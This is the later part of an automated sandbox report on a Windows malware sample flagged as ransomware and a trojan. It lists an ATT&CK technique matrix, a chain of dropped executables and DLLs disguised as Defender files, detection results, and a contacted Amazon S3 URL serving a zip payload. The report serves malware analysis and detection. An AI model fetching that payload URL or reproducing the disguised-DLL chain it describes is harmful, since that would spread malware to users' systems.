          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeCode function: 0_2_002BB06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002BB06B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041EF148 GetVersion,7_2_041EF148
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: rundll32.exe, 0000000B.00000002.3506787301.0000000004911000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3506787301.00000000049D1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Service Execution
          2
          Windows Service
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          LSASS Memory3
          File and Directory Discovery
          Remote Desktop ProtocolData from Removable Media11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Registry Run Keys / Startup Folder
          2
          Windows Service
          2
          Software Packing
          Security Account Manager45
          System Information Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook112
          Process Injection
          1
          Timestomp
          NTDS121
          Security Software Discovery
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          LSA Secrets2
          Process Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
          Masquerading
          Cached Domain Credentials31
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion
          DCSync11
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
          Process Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Rundll32
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1383277 Sample: WKYC506_2389030007-00901003... Startdate: 30/01/2024 Architecture: WINDOWS Score: 76 65 s3-r-w.sa-east-1.amazonaws.com 2->65 67 b38709202.s3.sa-east-1.amazonaws.com 2->67 79 Multi AV Scanner detection for dropped file 2->79 81 Machine Learning detection for dropped file 2->81 83 Yara detected Generic Downloader 2->83 85 Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil 2->85 12 WKYC506_2389030007-00901003007010_777380775_#U00b2.exe 4 2->12         started        15 svchost.exe 1 1 2->15         started        18 WKYC506_2389030007-00901003007010_777380775_#U00b2.exe 2->18         started        signatures3 process4 dnsIp5 55 C:\Users\user\AppData\Local\...\Update.exe, PE32 12->55 dropped 20 Update.exe 14 20 12->20         started        71 127.0.0.1 unknown unknown 15->71 file6 process7 file8 47 C:\Users\user\AppData\Local\...\Stand.exe, PE32+ 20->47 dropped 49 C:\Users\user\AppData\Local\...\Update.exe, PE32 20->49 dropped 51 C:\Users\user\AppData\Localxtra\Stand.exe, PE32 20->51 dropped 23 Stand.exe 5 20->23         started        process9 file10 53 C:\Users\user\AppData\Local\...\diskres2.dll, PE32 23->53 dropped 26 rundll32.exe 23->26         started        28 rundll32.exe 23->28         started        process11 process12 30 rundll32.exe 76 26->30         started        35 rundll32.exe 28->35         started        dnsIp13 69 s3-r-w.sa-east-1.amazonaws.com 52.95.163.114, 443, 49735 AMAZON-02US United States 30->69 57 C:\Program Files (x86)\...\shellext.dll, PE32+ 30->57 dropped 59 C:\Program Files (x86)\...\shellext.dll.mui, PE32 30->59 dropped 61 C:\...\ProtectionManagement.dll.mui, PE32 30->61 dropped 63 42 other malicious files 30->63 dropped 73 System process connects to network (likely due to code injection or exploit) 30->73 37 cmd.exe 30->37         started        39 shutdown.exe 30->39         started        75 Found stalling execution ending in API Sleep call 35->75 77 Uses shutdown.exe to shutdown or reboot the system 35->77 file14 signatures15 process16 process17 41 conhost.exe 37->41         started        43 sc.exe 37->43         started        45 conhost.exe 39->45         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          WKYC506_2389030007-00901003007010_777380775_#U00b2.exe5%ReversingLabs
          WKYC506_2389030007-00901003007010_777380775_#U00b2.exe1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Microsoft.NET\MpClient.dll100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\EppManifest.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\EppManifest.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpClient.dll10%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll3%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpCommu.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpCommu.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpDetours.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpDetours.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpOAV.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpProvider.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpRtp.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpSvc.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\NisSrv.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://defaultcontainer/tempfiles/sample.bsdiff0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://defaultcontainer/tempfiles/sample.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/package/services/metadata/core-properties/ea39ec67dff34a7992442f15ea616f88.p0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.exe0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
          http://defaultcontainer/lib/net48/Stand.exe0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.txt0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.rels0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.shasum0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
          http://schemas.openxmlformats.or0%Avira URL Cloudsafe
          https://unitedstates4.ss.wd.microsoft.us0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
          http://www.zhongyicts.com.cn0%VirustotalBrowse
          http://defaultcontainer/lib/net48/Stand.txt0%Avira URL Cloudsafe
          https://unitedstates1.ss.wd.microsoft.us0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.diff0%Avira URL Cloudsafe
          http://crl.ver)0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/diskres.dll0%Avira URL Cloudsafe
          https://unitedstates1.ss.wd.microsoft.us1%VirustotalBrowse
          http://www.founder.com.cn/cn0%Avira URL Cloudsafe
          https://unitedstates4.ss.wd.microsoft.usffl4unknownUriunsupportedserverCalluserActionhttps://europe.0%Avira URL Cloudsafe
          https://unitedstates4.ss.wd.microsoft.us1%VirustotalBrowse
          http://defaultcontainer/_rels/.rels0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/Stand_ExecutionStub.exe0%Avira URL Cloudsafe
          http://canonicalizer.ucsuri.tcs/68007400740070003a002f002f00https://bad0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.psmdcp0%Avira URL Cloudsafe
          http://defaultcontainer/Extra.nuspec0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          s3-r-w.sa-east-1.amazonaws.com
          52.95.163.114
          truefalse
            high
            b38709202.s3.sa-east-1.amazonaws.com
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.zipfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/myuser/myrepoUpdate.exe, 00000002.00000000.1651849310.0000000000372000.00000002.00000001.01000000.00000005.sdmp, Update.exe.2.drfalse
                  high
                  http://defaultcontainer/tempfiles/sample.bsdiffUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://www.fontbureau.com/designersGStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.com/designers/?Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bTheStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designers?Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://defaultcontainer/package/services/metadata/core-properties/ea39ec67dff34a7992442f15ea616f88.pUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.0000000002A6F000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000295E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://defaultcontainer/tempfiles/sample.nuspecUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://aka.ms/NpFeedbackunknownAMpSvc.dll.11.drfalse
                          high
                          https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.zipgrundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.tiro.comStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000004.00000003.1693238700.00000204770A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1693238700.0000020477107000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1693238700.00000204770F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1693238700.00000204770E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                              high
                              http://www.fontbureau.com/designersStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.goodfont.co.krStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://defaultcontainer/tempfiles/sample.exeUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.sajatypeworks.comStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://github.com/Microsoft/cpprestsdk.ThirdPartyNotices.txt.11.drfalse
                                  high
                                  http://www.typography.netDStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000004.00000003.1693238700.00000204770FF000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                                    high
                                    http://www.founder.com.cn/cn/cTheStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                                      high
                                      http://defaultcontainer/lib/net48/Stand.exeUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://defaultcontainer/tempfiles/sample.txtUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://defaultcontainer/tempfiles/sample.dllUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://defaultcontainer/tempfiles/sample.relsUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.ziprrundll32.exe, 0000000B.00000002.3505654355.0000000002DFA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://defaultcontainer/tempfiles/sample.shasumUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.galapagosdesign.com/DPleaseStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://aka.ms/NpBhFeedbackSinkholeMalicious-MpSvc.dll.11.drfalse
                                          high
                                          http://www.fonts.comStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sandoll.co.krStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdMpCommu.dll.11.drfalse
                                              high
                                              http://www.urwpp.deDPleaseStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://b38709202.s3.sa-east-1.amazonaws.com/rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.openxmlformats.orUpdate.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.sakkal.comStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drfalse
                                                  high
                                                  https://unitedstates4.ss.wd.microsoft.usNisSrv.exe.11.drfalse
                                                  • 1%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigestMpCommu.dll.11.drfalse
                                                    high
                                                    https://unitedstates1.ss.wd.microsoft.usNisSrv.exe.11.drfalse
                                                    • 1%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmp, ThirdPartyNotices.txt.11.drfalse
                                                      high
                                                      http://www.fontbureau.comStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://defaultcontainer/lib/net48/Stand.txtUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousMpCommu.dll.11.drfalse
                                                          high
                                                          http://defaultcontainer/tempfiles/sample.diffUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          http://crl.ver)svchost.exe, 00000004.00000002.3306383339.0000020476E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          https://api.github.com/#Update.exe, 00000002.00000000.1651849310.0000000000372000.00000002.00000001.01000000.00000005.sdmp, Update.exe.2.drfalse
                                                            high
                                                            http://defaultcontainer/lib/net48/diskres.dllUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.carterandcone.comlStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cnStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlStand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://unitedstates4.ss.wd.microsoft.usffl4unknownUriunsupportedserverCalluserActionhttps://europe.NisSrv.exe.11.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://defaultcontainer/_rels/.relsUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000004.00000003.1693238700.00000204770C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://defaultcontainer/lib/net48/Stand_ExecutionStub.exeUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)ThirdPartyNotices.txt.11.drfalse
                                                                    high
                                                                    http://www.jiyu-kobo.co.jp/Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.ziprsetrundll32.exe, 0000000B.00000002.3506787301.0000000004946000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers8Stand.exe, 00000003.00000002.1806006413.000002AF26C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://canonicalizer.ucsuri.tcs/68007400740070003a002f002f00https://badNisSrv.exe.11.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://b38709202.s3.sa-east-1.amazonaws.com/falseSc.zipArundll32.exe, 0000000B.00000002.3505654355.0000000002DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://defaultcontainer/tempfiles/sample.psmdcpUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          https://b38709202.s3.sa-east-1.amazonaws.com/Srundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://defaultcontainer/Extra.nuspecUpdate.exe, 00000002.00000002.1700421994.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000293B000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.0000000002A6F000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.000000000295E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            low
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            52.95.163.114
                                                                            s3-r-w.sa-east-1.amazonaws.comUnited States
                                                                            16509AMAZON-02USfalse
                                                                            IP
                                                                            127.0.0.1
                                                                            Joe Sandbox version:39.0.0 Ruby
                                                                            Analysis ID:1383277
                                                                            Start date and time:2024-01-30 13:31:34 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 13s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Run name:Run with higher sleep bypass
                                                                            Number of analysed new started processes analysed:21
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:WKYC506_2389030007-00901003007010_777380775_#U00b2.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:WKYC506_2389030007-00901003007010_777380775_.exe
                                                                            Detection:MAL
                                                                            Classification:mal76.rans.troj.evad.winEXE@22/84@1/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 60%
                                                                            HCA Information:Failed
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
